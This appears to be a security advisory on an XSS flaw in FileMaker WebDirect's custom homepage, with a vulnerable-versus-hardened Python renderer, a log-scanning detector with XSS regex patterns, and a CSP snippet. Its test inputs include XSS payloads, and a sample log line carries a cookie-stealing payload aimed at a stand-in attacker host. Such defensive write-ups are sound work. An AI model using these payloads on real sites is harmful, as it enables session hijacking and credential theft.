CVE-2025-46320 Overview
A cross-site scripting (XSS) vulnerability exists in the FileMaker WebDirect custom homepage feature that could allow an attacker to execute arbitrary JavaScript in the browser of an authenticated user. Script running in that context can read what the session can read and act as the victim, so the flaw can lead to unauthorized access to hosted data and to any further action the victim's session is permitted to perform against the FileMaker Server environment. The flaw has been fully addressed in FileMaker Server 22.0.4 and FileMaker Server 21.1.7.
Critical Impact
Attackers can inject malicious scripts through the WebDirect custom homepage, potentially stealing session tokens, credentials, or executing actions on behalf of authenticated users.
Affected Products
- Claris FileMaker Server versions prior to 22.0.4
- Claris FileMaker Server versions prior to 21.1.7
- Deployments of either branch that serve a FileMaker WebDirect custom homepage
Discovery Timeline
- 2026-02-24 - CVE-2025-46320 published to NVD
- 2026-02-25 - Last updated in NVD database
Technical Details for CVE-2025-46320
Vulnerability Analysis
This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), commonly known as Cross-Site Scripting (XSS). The flaw resides in the FileMaker WebDirect custom homepage functionality, where user-supplied input is not properly sanitized before being rendered in the web interface.
The attack requires user interaction, as a victim must navigate to a page containing the malicious payload. When successfully exploited, the attacker's JavaScript code executes within the security context of the victim's browser session, enabling potential session hijacking, credential theft, or further attacks against the FileMaker Server environment.
Root Cause
The vulnerability stems from insufficient input validation and missing output encoding in the WebDirect custom homepage feature. Where administrators configure custom homepage content, the application fails to sanitize or encode the data it reflects back into the page for the HTML context it lands in, so the browser interprets attacker-supplied text as markup and script rather than as inert content.
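The following is an added example, not Claris code and not the actual WebDirect sink (which is not published). It models the CWE-79 failure described above with a hypothetical homepage template that reflects request data into a text node and into an href attribute, and puts the vulnerable renderer beside a hardened one. The template, parameter names and the https-only link policy are assumptions for illustration.

```python
"""A minimal model of the CWE-79 failure described above, beside its fix.

Added example, not Claris code: the actual WebDirect custom-homepage sink is
not published, so render_homepage_vulnerable is a hypothetical stand-in for
a page that reflects request data into HTML without encoding. The hardened
version encodes for each output context and restricts URL schemes, because
HTML-encoding alone does not make a "javascript:" href safe.
"""
import html
from urllib.parse import urlsplit

# Hypothetical homepage template with two sinks: a text node and an href attribute.
TEMPLATE = '<h1>Welcome, {name}</h1><a href="{next}">Continue</a>'

ALLOWED_SCHEMES = ("", "https")  # relative links or https only (policy assumption)


def render_homepage_vulnerable(name: str, next_url: str) -> str:
    """Reflects both values verbatim: attacker text becomes markup or script."""
    return TEMPLATE.format(name=name, next=next_url)


def is_safe_href(url: str) -> bool:
    """Allow only relative or https URLs.

    Control characters and whitespace are rejected outright: browsers strip
    tabs and newlines inside a scheme, so "java\\tscript:" would otherwise
    slip past a naive scheme comparison.
    """
    if any(ord(ch) <= 0x20 or ord(ch) == 0x7F for ch in url):
        return False
    return urlsplit(url).scheme.lower() in ALLOWED_SCHEMES


def render_homepage_hardened(name: str, next_url: str) -> str:
    """Encode for the HTML context being written into.

    html.escape(quote=True) turns < > & " ' into entities, which neutralises
    tag injection in the text node and quote break-out in the attribute. It
    also encodes "&", so an entity-obfuscated scheme such as &#106;avascript:
    cannot be reconstituted by the browser. The scheme check covers the case
    encoding cannot: a syntactically valid but dangerous URL.
    """
    safe_next = next_url if is_safe_href(next_url) else "/"
    return TEMPLATE.format(
        name=html.escape(name, quote=True),
        next=html.escape(safe_next, quote=True),
    )


if __name__ == "__main__":
    payloads = [
        ("<script>alert(1)</script>", "/"),            # text-node injection
        ("Ann", '">x<svg/onload=alert(1)>'),           # attribute break-out
        ("Ann", "javascript:alert(document.cookie)"),  # scheme abuse
        ("Ann", "java\tscript:alert(1)"),              # scheme with embedded tab
    ]
    for name, nxt in payloads:
        print("VULN:", render_homepage_vulnerable(name, nxt))
        print("SAFE:", render_homepage_hardened(name, nxt))
```

The point the two renderers make is that encoding is context-specific: the text node needs entity encoding, the attribute needs entity encoding plus a scheme allowlist, and neither step on its own closes both sinks.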
Attack Vector
The attack is network-based and requires no authentication on the attacker's side. It does require user interaction: a victim must be induced to open a specially crafted URL or otherwise load content that carries the XSS payload. The scope is changed, which is the usual reading for XSS: the vulnerable component is the FileMaker Server web tier, but the impact lands in the victim's browser, a component under a different security authority, so data and actions reachable from that browser session, not only WebDirect itself, are exposed.
An attacker could exploit this vulnerability by:
- Crafting a malicious URL containing JavaScript payload targeting the custom homepage
- Distributing the malicious link via phishing emails or other social engineering techniques
- Waiting for an authenticated FileMaker user to click the link
- Executing arbitrary JavaScript in the victim's browser to steal session cookies, capture credentials, or perform unauthorized actions
Detection Methods for CVE-2025-46320
Indicators of Compromise
- Unusual JavaScript execution patterns or errors in client browser consoles when accessing FileMaker WebDirect
- Unexpected network requests to external domains originating from the FileMaker WebDirect interface
- Modified or suspicious content appearing in the custom homepage configuration
- User reports of unexpected behavior or redirects when accessing WebDirect
Detection Strategies
- Implement web application firewall (WAF) rules to detect common XSS payloads in requests to FileMaker WebDirect endpoints
- Monitor server logs for requests containing suspicious JavaScript patterns or encoded script tags
- Deploy browser-based XSS detection through Content Security Policy (CSP) violation reporting
- Utilize SentinelOne Singularity Platform to detect anomalous script execution and network behavior on endpoints accessing FileMaker WebDirect
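The log-monitoring item above, as an added example that is not part of the original advisory or of any Claris tooling: a small scanner that reads Apache combined-format access lines, keeps only requests to the WebDirect path, URL-decodes the request target repeatedly (double-encoding is a common WAF evasion) and reports which XSS indicators appear. The /fmi/webd prefix, the log format and the sample lines are assumptions or constructed data; the query parameter name in the payload lines is invented for illustration.

```python
"""Scan web-server access logs for reflected-XSS attempts against WebDirect.

Added example; not part of the original advisory and not Claris code.
Assumptions (labelled): Apache combined log format, /fmi/webd as the
WebDirect entry point, and the query parameter names in the constructed
sample, which are invented for illustration.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Assumption: WebDirect is reached under /fmi/webd. Add the path of your custom
# homepage (served from the FileMaker web server's document root) if it differs.
PATH_PREFIXES = ("/fmi/webd",)

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Indicator name -> pattern, applied to the fully URL-decoded request target.
XSS_PATTERNS = {
    "script_tag": re.compile(r"<\s*/?\s*script\b", re.I),
    "dangerous_tag": re.compile(r"<\s*(img|svg|iframe|object|embed|body)\b", re.I),
    "event_handler": re.compile(r"\bon(error|load|mouseover|focus|click|toggle)\s*=", re.I),
    "js_scheme": re.compile(r"javascript\s*:", re.I),
    "cookie_access": re.compile(r"document\s*\.\s*(cookie|location|domain)", re.I),
    "js_call": re.compile(r"\b(alert|eval|fetch|prompt)\s*\(", re.I),
}


def fully_decode(value: str, rounds: int = 3) -> str:
    """Strip up to `rounds` layers of percent-encoding, stopping when stable.

    Double-encoding (%253C -> %3C -> <) defeats matching on the raw URL, so
    decode until the string no longer changes.
    """
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; return None for lines that don't match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def xss_indicators(target: str) -> List[str]:
    """Names of the XSS indicators present in a decoded request target."""
    decoded = fully_decode(target)
    return [name for name, pat in XSS_PATTERNS.items() if pat.search(decoded)]


def scan(lines) -> List[Dict[str, object]]:
    """One hit record per request to a watched path that carries XSS indicators."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["target"].split("?", 1)[0]
        if not path.startswith(PATH_PREFIXES):
            continue
        found = xss_indicators(rec["target"])
        if found:
            hits.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "status": rec["status"],
                "target": rec["target"],
                "indicators": found,
            })
    return hits


# Constructed sample log. Lines 2 and 3 carry a single- and a double-encoded
# payload in an invented "page" parameter; lines 1, 4 and 5 are benign (line 5
# uses WebDirect's legitimate "script" URL parameter and must not be flagged).
SAMPLE_LOG = """\
203.0.113.7 - - [24/Feb/2026:10:01:02 +0000] "GET /fmi/webd/Sales HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Feb/2026:10:01:09 +0000] "GET /fmi/webd?page=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 310 "-" "Mozilla/5.0"
198.51.100.9 - - [24/Feb/2026:10:02:15 +0000] "GET /fmi/webd?page=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 310 "-" "curl/8.0"
198.51.100.9 - - [24/Feb/2026:10:03:00 +0000] "GET /fmi/data/v1/databases HTTP/1.1" 401 120 "-" "curl/8.0"
192.0.2.5 - - [24/Feb/2026:10:04:44 +0000] "GET /fmi/webd/Report?script=ShowAll HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit["ts"], hit["ip"], ",".join(hit["indicators"]), hit["target"])
```

Run it against the real access log with `scan(open(path))` after adjusting PATH_PREFIXES. The indicator list is deliberately narrow; a 200 response to a flagged request means the payload reached the page, which is the event worth alerting on, while 4xx responses to the same URLs are evidence of blocked attempts.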
Monitoring Recommendations
- Enable detailed access logging for the FileMaker WebDirect service
- Configure alerts for unusual patterns in HTTP request parameters targeting custom homepage endpoints
- Monitor for CSP violations which may indicate XSS exploitation attempts
- Review FileMaker Server administrative changes to custom homepage configurations
How to Mitigate CVE-2025-46320
Immediate Actions Required
- Upgrade FileMaker Server to version 22.0.4 or 21.1.7 immediately to address this vulnerability
- Review and audit any custom homepage configurations for potentially malicious content
- Implement Content Security Policy (CSP) headers to restrict script execution sources
- Temporarily disable custom homepage functionality if immediate patching is not feasible
Patch Information
Claris has released security updates that fully address this vulnerability. Administrators should upgrade to FileMaker Server 22.0.4 for the 22.x branch or FileMaker Server 21.1.7 for the 21.x branch. For detailed patch information and download links, refer to the Claris Support Article.
Workarounds
- Disable custom homepage functionality in FileMaker WebDirect until patches can be applied
- Implement strict Content Security Policy headers to prevent inline script execution
- Deploy a web application firewall (WAF) with XSS detection rules in front of the FileMaker Server
- Restrict access to FileMaker WebDirect to trusted networks or VPN-connected users only
# Example: Apache configuration to add a Content Security Policy header
# Add to the web server config fronting FileMaker Server (Apache on macOS/Linux; on
# Windows FileMaker Server uses IIS, where the equivalent goes in web.config).
# Caveat: WebDirect relies on inline scripts, so script-src 'self' is likely to break it.
# Deploy in Report-Only mode first (/csp-report is a placeholder endpoint you must host),
# review the violations, then switch to the enforcing header once the report stream is clean.
<IfModule mod_headers.c>
    Header set Content-Security-Policy-Report-Only "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; report-uri /csp-report"
    # Enforce once clean: Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline';"
</IfModule>
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


